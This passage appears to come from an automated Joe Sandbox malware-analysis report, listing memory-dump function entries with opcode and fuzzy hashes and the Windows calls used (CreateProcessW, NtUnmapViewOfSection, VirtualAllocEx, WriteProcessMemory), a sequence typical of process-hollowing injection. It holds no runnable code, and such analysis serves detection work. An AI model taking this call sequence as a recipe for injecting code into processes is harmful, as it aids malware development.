                    • Instruction Fuzzy Hash: B6C1CF3DA59617EEEF17A7618C12F3D79A9FB41B05F244519F0839A182EE34CE02A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 59047b311847c9dfcd54b4609c3ec7ebfc526144f90ef211ff4e0e9fff93ca8b
                    • Instruction ID: 3f6f28af0cac30f1d22ed61b65d7d938168239573eb5a3cfea28ad640e06d5f0
                    • Opcode Fuzzy Hash: 59047b311847c9dfcd54b4609c3ec7ebfc526144f90ef211ff4e0e9fff93ca8b
                    • Instruction Fuzzy Hash: C0B1CE3DA19617EEEF17A7618C12F3D79AAFB41B05F244519F0839A042EE34CE02A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: c8ee5f17dcb5f28ae2733c94792cadeed04190c56f688cabaa2e6329671c8746
                    • Instruction ID: 3ef9ec6cfff050ddf944b4105ec513e1ec0ebec3f643238cdd33fdd6b5c96065
                    • Opcode Fuzzy Hash: c8ee5f17dcb5f28ae2733c94792cadeed04190c56f688cabaa2e6329671c8746
                    • Instruction Fuzzy Hash: 00B1AE3DB59617EEEF17A7618C12F3D7DAAFB41B05F249518F1839A042EE34C902A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: f87226f02c6b9537023dbcfd3e48d645b2788d22ba3f4075fe87e6e0772af295
                    • Instruction ID: d5b1dddac74d11268b4d816f8c338379aebed133d9c5fd35b704056f7ef14f78
                    • Opcode Fuzzy Hash: f87226f02c6b9537023dbcfd3e48d645b2788d22ba3f4075fe87e6e0772af295
                    • Instruction Fuzzy Hash: 36B1903DB59617EEEF17A7618C12F3D7DAAFB41B09F245518F0839A142EE34C902A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 53ea77fb2fd8ceae4feccdad31961cf4784dca35f23adbf7ec4a2bc6ea0005e0
                    • Instruction ID: b0d9999d142196a076a439822661b294e66314edfb0f3c7ea4e0060226721f99
                    • Opcode Fuzzy Hash: 53ea77fb2fd8ceae4feccdad31961cf4784dca35f23adbf7ec4a2bc6ea0005e0
                    • Instruction Fuzzy Hash: FDB19F3DB59617EEEF17A7618C12F3D7DAAFB81B09F245518F0839A142EE34C902A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    • Opcode ID: 23fb8784c81a0c4d8619528a71653a8ad43e51c2ef58418232b7044396607454
                    • Instruction ID: 8b3b3d0264d12e72d1a2675ec38aa3dec3d0fe7a7bb9c82a597d2c756f8270fc
                    • Opcode Fuzzy Hash: 23fb8784c81a0c4d8619528a71653a8ad43e51c2ef58418232b7044396607454
                    • Instruction Fuzzy Hash: C3B1A03DB59617EEFF17A7618C12F3D79AAFB41B09F245518F0839A142EE34C902A531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    • Opcode ID: 8565c878a3deed42d47c02356dec811ee2fc4eb26b09eb4fadbda93de0f2137b
                    • Instruction ID: 025762c48f9f9ad57f4d09ba8bc899296eac79565a49914676b06f9a6f3b5a6c
                    • Opcode Fuzzy Hash: 8565c878a3deed42d47c02356dec811ee2fc4eb26b09eb4fadbda93de0f2137b
                    • Instruction Fuzzy Hash: 73A1B13DB59617EEEF17A7618C12F3D79A9FF41B09F245518F0839A182EE34C902A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    • Opcode ID: 7b87c3db8dc362504aba36e795895d3c41696d111f8d173b4f00d75f98f0832a
                    • Instruction ID: c6a00a3e5768f1f417b23da2fb33b82f040481681603503433c5781ee3d82d2f
                    • Opcode Fuzzy Hash: 7b87c3db8dc362504aba36e795895d3c41696d111f8d173b4f00d75f98f0832a
                    • Instruction Fuzzy Hash: B2A1A03DB58617EEEF17A7618C12F3D79A9FF41B09F245518F0839A182EE34C901A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    • Opcode ID: ca629caef0a835ae26e1444fee6d0834b4fb3b0edd8e052a36b4de6badd2e181
                    • Instruction ID: 589bff9ac5d402170ecc9f6e1a4a639d8a4d810d911f65155744c3882f98b226
                    • Opcode Fuzzy Hash: ca629caef0a835ae26e1444fee6d0834b4fb3b0edd8e052a36b4de6badd2e181
                    • Instruction Fuzzy Hash: 0EA19D3DA58617EEEF17A7618C12F3D7AA9FB41B09F245558F0839A142EE34C902A630
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: VirtualAllocEx$e
                    • API String ID: 963392458-3414709220
                    • Opcode ID: f1d57a2e5f4bb6830363ef58f08661e8d702e7259bd3d167468fe82860ee8c7e
                    • Instruction ID: e987d05ff2a697a925a1129e1225e70bac1cb04c83fb0ba92a089f485b4a14a8
                    • Opcode Fuzzy Hash: f1d57a2e5f4bb6830363ef58f08661e8d702e7259bd3d167468fe82860ee8c7e
                    • Instruction Fuzzy Hash: 48A19E3DA58613EEEF17A7618C12F3D7DA9FB41B09F245518F0839A152FE34C901A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: VirtualAllocEx$e
                    • API String ID: 963392458-3414709220
                    • Opcode ID: 58d1255eae8a6caefc0357cf6fb63d633457d868c0c8260190ca25ce653851f6
                    • Instruction ID: d7bdb1df41061e7e445965aadfd7a34be875c833c96706e1446d8fa7eecf321d
                    • Opcode Fuzzy Hash: 58d1255eae8a6caefc0357cf6fb63d633457d868c0c8260190ca25ce653851f6
                    • Instruction Fuzzy Hash: FB919E3DA58613EEEF17A7618C12F3D79A9FF41B09F249518F0839A152EE34C901A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00D91B9A
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: CreateProcessSectionUnmapView
                    • String ID: VirtualAllocEx$e
                    • API String ID: 1619107759-3414709220
                    • Opcode ID: 52778197a532161633e098df0325a76d3a3389b1dd9d2aa0d1ef766b4031aefb
                    • Instruction ID: d4b7d6c24ce6df997d4d70316651370d1852917f51016e3793277835be7f8527
                    • Opcode Fuzzy Hash: 52778197a532161633e098df0325a76d3a3389b1dd9d2aa0d1ef766b4031aefb
                    • Instruction Fuzzy Hash: DA81A13DA58513EEEF17A7618C02E3D7EA9FF81705F249558F08396152EE34C902A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00D91B9A
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocCreateProcessSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx$e
                    • API String ID: 2181670624-3414709220
                    • Opcode ID: 6fc698ad73ede1d33af53bfef04ffcc6a4ef853f0292bd4d88eaf2d3f9a98a61
                    • Instruction ID: ba6fa6696598f183de94ae423a4a00570a12170b41970662ebb3b0f2bf43787e
                    • Opcode Fuzzy Hash: 6fc698ad73ede1d33af53bfef04ffcc6a4ef853f0292bd4d88eaf2d3f9a98a61
                    • Instruction Fuzzy Hash: 0C81AF3DA58517EEFF1BA7618C12E3DBDA9FF81B05F249518F0839A152EE34C901A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00D91B9A
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocCreateProcessSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx$e
                    • API String ID: 2181670624-3414709220
                    • Opcode ID: 6faa3546c9fd00073e5a457d6f28b102ba98c7acca79cc76271f017ee15965bf
                    • Instruction ID: 4866ac4499f73eea1925b7b9d17b0c8fb8951f3bf9113db02412aaea8ab849af
                    • Opcode Fuzzy Hash: 6faa3546c9fd00073e5a457d6f28b102ba98c7acca79cc76271f017ee15965bf
                    • Instruction Fuzzy Hash: 9371A23DA54517EEEF1BA7618C02A3DBEA9FF81B05F249519F04396153EE34C901A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00D91B9A
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocCreateProcessSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx$e
                    • API String ID: 2181670624-3414709220
                    • Opcode ID: 3ad994d27de5206e7c8a6355cba1e8e1cb9d50b88e8de6fe583e2850bcc5eb5d
                    • Instruction ID: f2c9b0bbee95a4d5003e1ccf93add6ef77d3f70b4f502ca312021f8c8be90741
                    • Opcode Fuzzy Hash: 3ad994d27de5206e7c8a6355cba1e8e1cb9d50b88e8de6fe583e2850bcc5eb5d
                    • Instruction Fuzzy Hash: 9B71B23DA54617EEEF1BA7618C12E3DBEA9FF81705F249419F04396153EE34C901A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: af9ac0b87de969eadb4c408595c800d3ac696967ce67c7bf93f4a9e7a4054187
                    • Instruction ID: 6f4eb785bc8a640d2c04e728726d1e864ab47e80abdb65ec4d95bfb7f4df2ef4
                    • Opcode Fuzzy Hash: af9ac0b87de969eadb4c408595c800d3ac696967ce67c7bf93f4a9e7a4054187
                    • Instruction Fuzzy Hash: 33517A3DA68613EEFF1B67619C12E3D79A9FF81B05F249518F08396183EE35CA026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: 568a242ed199f376b7d6f9cbc8b1507a3290ca4932e641ff519afa140fa44415
                    • Instruction ID: c1b519e87c106c0ee78433fd517b0c3fe82ba76f673ab02863b710301e509030
                    • Opcode Fuzzy Hash: 568a242ed199f376b7d6f9cbc8b1507a3290ca4932e641ff519afa140fa44415
                    • Instruction Fuzzy Hash: DF517B3DA58513AEFF1B67619C12E3D7D99FF81B05F289518F08396183EE35CA026631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                      • Part of subcall function 00D91CB0: VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: 7898c4c87012bef95323b5df6b49c50ae41beeaaa732c7ee309b8c548582080b
                    • Instruction ID: c980e05d5a68f9f36fa4f2d5bc4cd742d3c56c9cd58ec57f1d2d4059e3cd9005
                    • Opcode Fuzzy Hash: 7898c4c87012bef95323b5df6b49c50ae41beeaaa732c7ee309b8c548582080b
                    • Instruction Fuzzy Hash: 2351583DA58513AEFF1B67619C12E3D79A9FF81B05F249519F0839A183EE34CA026631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                      • Part of subcall function 00D91CB0: VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: b369795b6b3b4aad0a1a6a5f6562f5c1c15e44ebac51d73e2272b5ab69c00b1d
                    • Instruction ID: e738e169da0dab9db3107a140b8d3590b2555a907693e50e0583a28c18c5e89e
                    • Opcode Fuzzy Hash: b369795b6b3b4aad0a1a6a5f6562f5c1c15e44ebac51d73e2272b5ab69c00b1d
                    • Instruction Fuzzy Hash: AE51793DA58613AEFF1B67609C12E3D79A9FF81B05F249519F08396093EE34CA026631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 00D91C71
                      • Part of subcall function 00D91CB0: VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: a629abad902a7b65e16c71844c4cce067917ef760d73d4f94390d060d10b591f
                    • Instruction ID: 2f23a7320d7969c4939f3b1f68e970b05ef22f73e8bf4f2731c914750e128ca1
                    • Opcode Fuzzy Hash: a629abad902a7b65e16c71844c4cce067917ef760d73d4f94390d060d10b591f
                    • Instruction Fuzzy Hash: 03519B3DA18613EEFF1B67619C12E3D79A9FF81B05F249519F08396083EE34CA01A631
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: a3f1874cad9720e790f306d334e0fea3cbc48968f35a2c28eb104fcec57d9bb2
                    • Instruction ID: 01a875e52f29535bbb2ba5334ede5508dd4eaf32e0342ce5c74e6e1dbec4afa9
                    • Opcode Fuzzy Hash: a3f1874cad9720e790f306d334e0fea3cbc48968f35a2c28eb104fcec57d9bb2
                    • Instruction Fuzzy Hash: ED418B3D668513EEFF1B63609C12E3D79A9FF81B05F289528F0839A043DE34C9026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: 3342f43370aa44f67f4078b01202c6b2d78177dbd371649fe64e271375d627ac
                    • Instruction ID: 8c67ae45290de96fb8a4f7acc6de79ebbd48ef8c9d642ed425ce494fc5f19155
                    • Opcode Fuzzy Hash: 3342f43370aa44f67f4078b01202c6b2d78177dbd371649fe64e271375d627ac
                    • Instruction Fuzzy Hash: C6417B3DA28513EEFF1B67619C12E3D6999FF81B05F689518F083D6143EE35C9026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: 8e9852d15e4511fca0b19a9af5f756f5d2b73f2fba728dfd1361f970931d5a43
                    • Instruction ID: 87cf73e1dae15fc4029ce133e41ed98b1a019703cb067a4f61e891d4f128ca62
                    • Opcode Fuzzy Hash: 8e9852d15e4511fca0b19a9af5f756f5d2b73f2fba728dfd1361f970931d5a43
                    • Instruction Fuzzy Hash: E3417A3DA29513EEFF1B67619C02E3E6D99FF91B05F28955CB08395043EE35CA026531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 00D91D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00D91DFF
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: b7d3ed824fc410e548ae39d9472c26443d1d8b5b60dd02e76ff90d4b25fedc1b
                    • Instruction ID: a36a3c48c5bb0250fa10345b226b620563fa9c9e9b21533dd965cc89692eb632
                    • Opcode Fuzzy Hash: b7d3ed824fc410e548ae39d9472c26443d1d8b5b60dd02e76ff90d4b25fedc1b
                    • Instruction Fuzzy Hash: B0415B3DA18513EEFF1B67A19C12E3E69A9FF91B05F249518F08396043EE34CA016531
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 00D9137C
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID: U$f
                    • API String ID: 2738559852-3222212738
                    • Opcode ID: 363cdfcf4f9ed0e7e83d16517b91efe320dc7ba137195d6f91fac9ff9ab5755e
                    • Instruction ID: e0811341768d2c7fee4e3ba58fd896aa135209e9d8c8a932599cf8e878bf56dc
                    • Opcode Fuzzy Hash: 363cdfcf4f9ed0e7e83d16517b91efe320dc7ba137195d6f91fac9ff9ab5755e
                    • Instruction Fuzzy Hash: DC515739E14616DFEF16DB64CC81BBDBAB1FB84304F658168D087EB241DA34DE019E60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID: U$f
                    • API String ID: 2591292051-3222212738
                    • Opcode ID: cbd23944fa6dac052ea3826d733f5c9681578b518551f3281ed63a448b419184
                    • Instruction ID: cc4cce95fa4e7942451d39453af08d85e94e076f1ad39fea8a5078c024a4dd9f
                    • Opcode Fuzzy Hash: cbd23944fa6dac052ea3826d733f5c9681578b518551f3281ed63a448b419184
                    • Instruction Fuzzy Hash: 26514839E546169FEF16DE54CC81BBDB6B1FB98304F668168D087EB240DA34EE019E60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID: U$f
                    • API String ID: 2591292051-3222212738
                    • Opcode ID: 1672dd24bb482af518c7ed726df05ca0bd58107dd05941ded8a85d3e04d6d6ed
                    • Instruction ID: ea0664e7c77b30418a85e05a5aeb7107db6f97212f7f0dfcb2ded1a1c2146291
                    • Opcode Fuzzy Hash: 1672dd24bb482af518c7ed726df05ca0bd58107dd05941ded8a85d3e04d6d6ed
                    • Instruction Fuzzy Hash: D2512839E146169FEF16DA54CC81BBDBBB1FB94304F6651A8D087EB240DA34EE019E60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                      • Part of subcall function 00D915C4: VirtualAlloc.KERNELBASE ref: 00D91643
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: 532070062cf11b9904d3a9db09fd8773f3dc478adfd5a9ce6003f0dfcfe5d1dd
                    • Instruction ID: ffe672b7dce5b01f7f740e9cf0c198d5dce2a9f265c36232e38f5febf01a8d58
                    • Opcode Fuzzy Hash: 532070062cf11b9904d3a9db09fd8773f3dc478adfd5a9ce6003f0dfcfe5d1dd
                    • Instruction Fuzzy Hash: 4551183AE046169FEF16DA54CC81BBDB6B1FB98304F5651A8D087FB240DA34EE019F60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                      • Part of subcall function 00D915C4: VirtualAlloc.KERNELBASE ref: 00D91643
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: 4853ab38e3ee6ab3172fa8a93713d0e47700ea2fba302bc6369f40e7867e9981
                    • Instruction ID: b96b2797b591b640b35008e5d661d8ac9e051b95a20b23a2ff13791b55bf402a
                    • Opcode Fuzzy Hash: 4853ab38e3ee6ab3172fa8a93713d0e47700ea2fba302bc6369f40e7867e9981
                    • Instruction Fuzzy Hash: DC41283AE046169FEF15DA54CC81BBDB6B1FB98304F5651A8D047FB240DA34EE019F60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                      • Part of subcall function 00D915C4: VirtualAlloc.KERNELBASE ref: 00D91643
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: d0931d3c0a29b7f7d1ee63a1d07ef245cda2e46c2bbe9825bb633b5d00c70897
                    • Instruction ID: d0aec9352e1126d7d5cbec437307be12ef39d7b4fcd39ef7150fc2591b759b88
                    • Opcode Fuzzy Hash: d0931d3c0a29b7f7d1ee63a1d07ef245cda2e46c2bbe9825bb633b5d00c70897
                    • Instruction Fuzzy Hash: 2E41D23AE446258FDF16CA54CC81BADB6B1FB98304F6651A8D18AEB240DA34EE419E50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 00D91419
                      • Part of subcall function 00D915C4: VirtualAlloc.KERNELBASE ref: 00D91643
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.331634198.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_d90000_mllvvvh.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
